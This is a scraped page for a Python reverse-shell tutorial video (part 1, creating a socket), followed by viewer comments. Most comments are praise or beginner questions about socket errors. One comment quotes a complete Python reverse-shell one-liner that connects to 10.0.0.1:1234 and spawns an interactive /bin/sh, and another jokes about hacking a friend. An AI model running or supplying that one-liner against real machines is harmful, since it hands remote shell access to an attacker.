Python Reverse Shell Tutorial - 1 - Creating a Socket

preview_player
Показать описание
Рекомендации по теме
Комментарии
Автор

Hey Bucky, Ive been watching your channel for about 3 years now. One thing I am always reminded about when I watch your videos is how programming has unlimited potential....but the one thing I learned is try to have a little fun with it! Great gaming and other fun tutorials. I wish you the best in life!

Xarlos
Автор

Thanks, I have looked everywhere to find a good tutorial on socket programming, thanks so much.

abhiramkidambi
Автор

Bucky you are the man! Thank you for your amazing work and you make it fun!

KevinMThomas
Автор

Good to meet your material again and again. As usual. Thanks

rainbowking
Автор

thanks for explaining the legit purposes of this. my whole impression was just the malicious uses.

europa_bambaataa
Автор

Your videos are really awesome !
You deserve the success ! :)

xvr
Автор

helping a friend... nah
working as an administrator... nah
hacking a friend... YEH!

andrewpotter
Автор

noob question here, what can I expect from a reverse shell quick cheat sheet? One of the scripts provided below:

python -c 'import socket, subprocess, os;s=socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect(("10.0.0.1", 1234));os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2);p=subprocess.call(["/bin/sh", "-i"]);'

descendentofthemystc
Автор

Thank You Bucky for making this tutorial you are the best!

shahardagan
Автор

i love u ur amazing i watching u about 1 year

frangay
Автор

Bucky nuff respect from Jamaica!!
Big Up thanks yo @thenewboston

di_nerd_apps
Автор

Hey bucky please help me ...I have two laptops both are connected with my mobile hotspot when i try to connect both then they connect perfectly but when i try to connect with my friend in another city then nothing is happening

YashovardhanJha
Автор

I Followed all of the source code but when executing this i get this error : Socket Binding Error: '[Errno 98] Address already in use' from ubuntu 20.04 terminal

bugzy
Автор

you sound like a 18 year old kid who knows a lot of things about computers... please teach me

ObtecularPk
Автор

sorry, has a error: Cannot send command output: descriptor 'encode' requires a 'str' object but received a 'unicode'

hiim
Автор

Hey Backy! If I want to learn about this kind of stuff where do I begin? BTW your content is superb amazing!!!

evanwibisono
Автор

Can anyone explain why port and host were defined as globals within the function as opposed to just declaring them outside of it?

jeremyphillips
Автор

02:12 What if both of us have dynamic IP addresses? :J

bonbonpony
Автор

Thenewboston, i need your help for some python networking issue. Please help

GammAstr
Автор

I like how he just stopped the video lol

prasannagedda